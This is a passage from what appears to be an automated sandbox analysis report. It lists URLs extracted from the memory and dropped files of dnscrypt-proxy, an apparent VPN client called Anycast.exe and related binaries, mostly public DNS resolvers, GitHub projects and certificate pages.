        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://github.com/0xb33)
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://github.com/DNSCrypt/dnscrypt-resolvers
        Source: Anycast.exe, Anycast.exe, 0000002B.00000002.4473917532.000000000CD02000.00000002.00000001.01000000.00000027.sdmp, Newtonsoft.Json.dll.6.drString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://github.com/PeterDaveHello/dnslow.me)
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://github.com/StevenBlack/hosts
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/StevenBlack/hostsAgIAAAAAAAAADjExNi4yMDIuMTc2LjI2oMwQYNOcgym2K2-8fQ1t-TCYabmB5-Y5
        Source: dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drString found in binary or memory: https://github.com/bhanupratapys/dnswarden
        Source: System.ValueTuple.dll.6.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
        Source: System.ValueTuple.dll.6.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
        Source: Anycast.exeString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ff
        Source: Anycast.exe, Anycast.exe, 0000002B.00000002.4469560551.0000000007612000.00000002.00000001.01000000.00000020.sdmp, Anycast.exe, 0000002B.00000002.4458477595.0000000005EB2000.00000002.00000001.01000000.00000017.sdmp, Anycast.exe, 0000002B.00000002.4464886117.0000000006DF2000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
        Source: Anycast.exe, 0000002B.00000002.4469617949.0000000007616000.00000002.00000001.01000000.00000020.sdmp, Anycast.exe, 0000002B.00000002.4458477595.0000000005EB2000.00000002.00000001.01000000.00000017.sdmp, Anycast.exe, 0000002B.00000002.4464886117.0000000006DF2000.00000002.00000001.01000000.0000001C.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
        Source: System.Security.Permissions.dll.6.dr, System.Configuration.ConfigurationManager.dll.6.drString found in binary or memory: https://github.com/dotnet/runtime
        Source: Anycast.exe, Anycast.exe, 0000002B.00000002.4458091074.0000000005AE2000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://github.com/getsentry/sentry-dotnet
        Source: Anycast.exe, 0000002B.00000002.4458091074.0000000005AE2000.00000002.00000001.01000000.00000015.sdmpString found in binary or memory: https://github.com/getsentry/sentry-dotnet?
        Source: Anycast.exe, Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: https://github.com/hardcodet/wpf-notifyicon
        Source: Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: https://github.com/hardcodet/wpf-notifyicon.
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121DE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012231000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/m13253/dns-over-https)
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012094000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/m13253/dns-over-https)9mYW1pbHk
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012094000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/m13253/dns-over-https)9mYW1pbHkdoh-server/2.2.2.q9.7
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012094000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/m13253/dns-over-https)nNvcmVk
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/m13253/dns-over-https)sdns://AQMAAAAAAAAAETk0LjE0MC4xNC4xNDo1NDQzINErR_JS3PLCu_iZ
        Source: dnscrypt-proxy.exe, 00000029.00000003.4237215021.0000000012461000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://github.com/pmkol/easymosdns).
        Source: public-resolvers.md.6.drString found in binary or memory: https://github.com/poentodewo)
        Source: dnscrypt-proxy.exe, 00000029.00000003.4239784754.00000000123AA000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460045710.00000000123AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://helios.plan9-dns.com
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://helios.plan9-dns.com/dns-query?body_hash=34e8cc3d524217cbae7043173aef953f2496bb8aa70be861ddb
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012082000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://helios.plan9-dns.com/dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABB24eTBkTxb2NJ49
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://helios.plan9-dns.com2.dnscrypt-cert.dnscry.pt.
        Source: 111.exe, 00000006.00000002.2249860601.0000000000778000.00000004.00000020.00020000.00000000.sdmp, 111.exe, 0000001C.00000002.2317100641.0000000000498000.00000004.00000020.00020000.00000000.sdmp, Anycast VPN.url.6.drString found in binary or memory: https://hm2buy.com
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://iswleuven.be).
        Source: public-resolvers.md.6.drString found in binary or memory: https://jlongua.github.io/plan9-dns
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jp.tiarap.org/dns-query?
        Source: dnscrypt-proxy.exe, 00000029.00000003.3417312133.0000000012520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jp.tiarap.org/dns-query?body_hash=255e4e7acdfe600c5a38889c46de48302b59954def3f99af9c27ca88e5
        Source: dnscrypt-proxy.exe, 00000029.00000003.3417312133.0000000012520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jp.tiarap.org/dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABCdFe7UahlZMLTgf5uauWSn
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jp.tiarap.org/dns-query?https://jp.tiarap.org/dns-query?
        Source: sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drString found in binary or memory: https://junkurihara.github.io/dns/).
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://libredns.gr/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://libredns.gr//
        Source: public-resolvers.md.6.drString found in binary or memory: https://limotelu.org
        Source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe, 0000002B.00000002.4454319070.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Anycast.exe.6.drString found in binary or memory: https://list-cn-1304018649.cos.accelerate.myqcloud.com/list.txt
        Source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe, 0000002B.00000002.4454319070.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Anycast.exe.6.drString found in binary or memory: https://list4any.oss-accelerate.aliyuncs.com/list.txt
        Source: 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460096953.00000000123B2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012054000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419459951.00000000124E8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239651821.00000000123B0000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drString found in binary or memory: https://litepay.ch
        Source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe, 0000002B.00000002.4454319070.00000000037A1000.00000004.00000800.00020000.00000000.sdmp, Anycast.exe.6.drString found in binary or memory: https://los.network/index.php?rp=/knowledgebase/3/%E6%9C%8D%E5%8A%A1%E6%9D%A1%E6%AC%BE.html
        Source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe, 0000002B.00000002.4454319070.00000000037A1000.00000004.00000800.00020000.00000000.sdmp, Anycast.exe.6.drString found in binary or memory: https://los.network/index.php?rp=/knowledgebase/4/%E9%9A%90%E7%A7%81%E6%94%BF%E7%AD%96.html
        Source: public-resolvers.md.6.drString found in binary or memory: https://meganerd.nl/encrypted-dns-server
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012108000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://mullvad.net/en/help/dns-over-https-and-dns-over-tls/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012108000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mullvad.net/en/help/dns-over-https-and-dns-over-tls/Connects
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238314093.000000001241A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://open.dns0.eu/
        Source: 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460096953.00000000123B2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419459951.00000000124E8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239651821.00000000123B0000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drString found in binary or memory: https://openinternet.io
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, public-resolvers.md.6.drString found in binary or memory: https://puredns.org
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, public-resolvers.md.6.drString found in binary or memory: https://puredns.org/family
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://quad9.net/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://raw.githubusercontent.com/DNSCrypt/dnscrypt-resolvers/master/v2/parental-control.md
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://raw.githubusercontent.com/DNSCrypt/dnscrypt-resolvers/master/v2/public-resolvers.md
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://raw.githubusercontent.com/DNSCrypt/dnscrypt-resolvers/master/v2/relays.md
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://safesurfer.io
        Source: sf-psvfcjj4czdu3e3p.tmp.41.drString found in binary or memory: https://scaleway.com
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238924252.00000000123D6000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460281389.00000000123DA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://scaleway.comAnonymized
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://sdns.360.net/
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sdns.360.net/DNSSEC-aware
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://sigfried.be)
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012218000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120D2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://statistics.ahadns.com/?server=la
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statistics.ahadns.com/?server=laA
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012218000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120D2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://statistics.ahadns.com/?server=nl
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statistics.ahadns.com/?server=nlBlocks
        Source: Anycast.exe, 0000002B.00000002.4454319070.00000000039F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.anycastjsq.com/?uid=
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460096953.00000000123B2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419459951.00000000124E8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239651821.00000000123B0000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.drString found in binary or memory: https://techsaviours.org
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://techsaviours.org/
        Source: public-resolvers.md.6.drString found in binary or memory: https://upset.dev
        Source: QRCoder.dll.6.drString found in binary or memory: https://wa.me/
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://wevpn.com/dns
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001218C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://wikimedia-dns.org/dns-query?body_hash=82e05047d2b9c6ae5833cf65f256043b6cd57ad7255797d4fe9b6a
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001218C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://wikimedia-dns.org/dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABBafARRqmqHR2xwdMAI
        Source: System.Net.Http.Formatting.dll.6.drString found in binary or memory: https://www.asp.net
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120F4000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012082000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://www.bortzmeyer.org/doh-bortzmeyer-fr-policy.html
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bortzmeyer.org/doh-bortzmeyer-fr-policy.htmlBlocks
        Source: QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.drString found in binary or memory: https://www.certum.pl/CPS0
        Source: wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: https://www.digicert.com/CPS0
        Source: public-resolvers.md.6.drString found in binary or memory: https://www.digitale-gesellschaft.ch).
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120D2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://www.dns0.eu/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dns0.eu/Wikimedia
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460753356.0000000012446000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drString found in binary or memory: https://www.dnscry.pt
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.pt%
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.pt/
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238206877.0000000012444000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460753356.0000000012446000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.pt/B
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.pt8
        Source: dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptDNSCry.pt
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptH(
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238206877.0000000012444000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460753356.0000000012446000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptPY5
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238206877.0000000012444000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460753356.0000000012446000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptQ
        Source: dnscrypt-proxy.exe, 00000029.00000003.4239885157.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptU
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461159840.0000000012470000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236825936.000000001246D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptct
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptf
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461159840.0000000012470000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239885157.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461159840.000000001247B000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236825936.000000001246D000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptg
        Source: dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dnscry.ptk.
